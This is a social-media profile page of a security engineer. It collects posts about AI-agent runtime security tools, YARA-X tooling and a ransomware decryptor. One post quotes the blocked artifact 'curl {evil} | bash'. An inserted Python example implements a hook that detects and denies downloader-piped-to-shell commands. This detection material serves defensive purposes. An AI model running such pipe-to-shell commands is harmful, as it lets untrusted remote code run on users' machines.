Tomáš Ďuriš

52 posts

@duristomas67

Senior Software engineer at Gen Digital (Avast) and YARA/YARA-X contributor

Joined January 2013
122 Following, 70 Followers
Tomáš Ďuriš retweeted
Jakub Kroustek @JakubKroustek
"Tool call firewalls" is a great way to put it. Vaclav Belak from our @GenThreatLabs team and @joshavant drove this into @openclaw. We needed async approval hooks for Sage (our open-source agent safety layer), so Vaclav contributed them directly upstream. #AgentSafety #OpenClaw #SageADR github.com/gendigitalinc/…
josh avant @joshavant

Landed a nice new security feature in this one: Plugins now have the ability to ask for the user’s permission during the before_tool_call hook. This gives developers an essential UX primitive for building interactive tool call ‘firewalls’.

WAGMİ 100x💎 @gemsnper
@AISecHub does claudit-sec also offer capabilities for real-time monitoring or just static audits? continuous updates on AI-driven risks could be a game changer in this space.
AISecHub @AISecHub
claudit-sec - github.com/HarmonicSecuri… Security audit tool for Claude Desktop and Claude Code on macOS single-command visibility into MCP servers, extensions, plugins, connectors, scheduled tasks, and permissions. Claude Desktop introduces a new class of endpoint risk: AI agents with autonomous execution, persistent scheduled tasks, MCP server integrations, browser-control extensions, and OAuth-authenticated connectors to external services. Most of this configuration lives in JSON files scattered across multiple directories with no centralised visibility. #ClaudeSecurity #MCPServerSecurity #ClaudeDesktop #AISecurity #EndpointSecurity #AISecurity
Tomáš Ďuriš retweeted
Jakub Kroustek @JakubKroustek
How well your AI agent is protected heavily depends on which platform it runs on. We found this out building Sage 🛡️, an open-source runtime security layer for AI agents. Integrating across Claude Code, Cursor, OpenClaw... each platform exposes a different subset of security-relevant events. A few report properly, some partially, the rest not at all. No amount of better rules can fix that. You need a contract between agent platforms and security tools. What gets reported, when, and how decisions are enforced. That contract didn't exist. So we wrote one at @GenThreatLabs. Today we published AARTS, the AI Agent Runtime Safety Standard. Open spec, vendor-neutral, designed so any security engine can plug into any compliant host. Not tied to Sage. Spec is open. We need platform builders and security vendors to collaborate on it and adopt it to make it real. 🤝 @bcherny @steipete @OpenAI @Copilot gendigital.com/blog/news/comp…
NetworkChuck @NetworkChuck
Want to know if your OpenClaw skills are actually malicious? 👀 Bitdefender Labs found that 17% of skills analyzed in early February 2026 are showing malicious behavior. We’re talking backdoors and data exfiltration hidden in plain sight! I’m using the Bitdefender AI Skills Checker to scan my skills before I even think about installing them. It’s a free tool that gives you a full risk assessment report so you know exactly what’s under the hood ✅ Check your skills for FREE here: bitdefend.me/AICheckerNC @Bitdefender #TrustedAlways #Ad
Peter Steinberger 🦞 @steipete
Since I spend my night again sifting through security advisories, folks, security researchers, slop clankers, PLEASE - read docs.openclaw.ai/gateway/securi… and github.com/openclaw/openc… The security model of OpenClaw is that it's your PERSONAL assistant (one user - 1...many agents). IT IS NOT A BUS. If you want to have multiple users that are adversarial to each other, use one VPS per gateway and user. (or Mac Minis, if you like spending money) I closed like 20 reports today that try to force it into something it was never designed for and that would just add loads of needless complexity and would introduce unnecessary bugs that won't benefit the vast majority of users.
Tomáš Ďuriš retweeted
Jakub Kroustek @JakubKroustek
🛡️ Sage by Gen Digital: Threat Blocked 🛡️
🚨 Threat: Remote code execution via curl pipe to shell
Severity: CRITICAL
Artifact: curl {evil} | bash
AI agents do crazy things - with full access to your machine, data, sometimes even finance. We built an open-source security solution that sits inside the agent and checks every action before it runs. Open-sourced under the Apache 2.0 license. 200+ detection rules and heuristics under the Detection-Rule-License (DRL) by @cyb3rops. Support for @claudeai (@bcherny), @cursor_ai, @openclaw... Try it. Break it. Tell us what's missing. github.com/avast/sage
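A constructed example of the kind of pre-execution check the Sage post above describes (every action inspected before it runs, here for the "curl pipe to shell" artifact), combined with the permission-prompt idea from the before_tool_call thread earlier on this page. It is not code from Sage, OpenClaw or Gen Digital; the hook shape (a decision dict with allow / ask / deny and the rule that fired), the rule names and the shlex-based tokenizing are assumptions.

```python
# Constructed example: hook shape and allow/ask/deny decisions are assumptions, not the OpenClaw or Sage API.
import shlex

DOWNLOADERS = {"curl", "wget", "fetch"}
SHELLS = {"bash", "sh", "zsh", "dash", "ksh"}
INTERPRETERS = SHELLS | {"python", "python3", "perl"}
WRAPPERS = {"sudo", "env", "nohup", "command", "exec"}  # prefixes that hide the real program
SEPARATORS = {";", "&&", "||", "&", "|"}

def _segments(tokens):
    """Split tokens into (words, preceded_by_pipe) segments at ; && || & and |."""
    out, cur, piped = [], [], False
    for tok in tokens + [";"]:
        if tok in SEPARATORS:
            if cur:
                out.append((cur, piped))
            cur, piped = [], tok == "|"
        else:
            cur.append(tok)
    return out

def _program(segment):
    """Real program name, past sudo/env wrappers, their flags and VAR=value prefixes."""
    words = [w for w in segment if w.rsplit("/", 1)[-1] not in WRAPPERS and not w.startswith("-")
             and not ("=" in w and w.split("=")[0].isidentifier())]
    return words[0].rsplit("/", 1)[-1] if words else ""  # /usr/bin/bash -> bash

def find_pipe_to_shell(command):
    """Return the offending 'downloader | interpreter' text, or None (ValueError on bad quotes)."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)  # | ; && become own tokens
    lexer.whitespace_split = True
    segs = _segments(list(lexer))
    for (prev, _), (cur, piped) in zip(segs, segs[1:]):
        if piped and _program(prev) in DOWNLOADERS and _program(cur) in INTERPRETERS:
            return " ".join(prev) + " | " + " ".join(cur)
    for seg, _ in segs:  # the same pattern hidden inside sh -c "..." is checked recursively
        if _program(seg) in SHELLS and "-c" in seg[:-1]:
            hit = find_pipe_to_shell(seg[seg.index("-c") + 1])
            if hit:
                return hit
    return None

def check_command(command):
    """Assumed hook decision for a shell tool call: deny, ask or allow, with the rule that fired."""
    try:
        hit = find_pipe_to_shell(command)
    except ValueError:  # unbalanced quotes: do not guess, hand the call to the user
        return {"decision": "ask", "rule": "unparseable-command"}
    if hit:
        return {"decision": "deny", "severity": "CRITICAL", "rule": "curl-pipe-to-shell", "artifact": hit}
    return {"decision": "allow"}
```

This single rule only covers the piped form; a download followed by a separate execution step (`curl ... ; bash file`) is deliberately left to a separate rule, which is why the allow decision for that case is not a false negative of this check.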
Tomáš Ďuriš retweeted
Gen Threat Labs @GenThreatLabs
Another Gen contribution to YARA-X upstream thanks to Albert Tikaiev (github.com/prosperritty): A YARA-X Language Server integrated directly into the YARA-X ecosystem, built on the error-tolerant parser started by Tomas Duris (github.com/TommYDeeee). It all started in 2017 with yaramod (github.com/avast/yaramod), an alternative YARA parser we built for linters and static analysis tools. Back then, we didn't even know what a language server was. After several years of iteration, in 2022 we released the first #YARA language server (YLS) on our GitHub (github.com/avast/yls), made by @KastakMatej, though it lived outside the YARA ecosystem. With YARA-X, we saw an opportunity for a unified ecosystem containing all the tooling we've been building and open-sourcing over the years. After adding the error-tolerant parser built on rowan in 2024, the language server was the natural next step. We're grateful @plusvic was open to the idea, accepted it upstream, and even improved it. This isn't our final stop. We'll continue helping build an even stronger YARA-X toolkit. Stay tuned!
Victor M. Alvarez @plusvic

I'm happy to introduce the official YARA language server for Visual Studio Code. virustotal.github.io/yara-x/blog/in… Many thanks to Albert Tikaiev for putting the first stone in this initiative (github.com/prosperritty)

Tomáš Ďuriš retweeted
Jakub Kroustek @JakubKroustek
Proud of the work we’re doing and kudos to @LadislavZezula! 💪 Check out the free decryption tool for the #Mallox / #TargetCompany #ransomware that hit in '23-'24. Details & download link here: gendigital.com/blog/news/inno… #DontPayUp #GenThreatLabs
Gen Threat Labs @GenThreatLabs

🚨 Great news! 🚨 Our team has released a free #decryption tool for the #Mallox / #TargetCompany #ransomware variant that was active throughout 2023 and early 2024. Find the download link and full details here: gendigital.com/blog/news/inno… #DontPayUp #GenThreatLabs
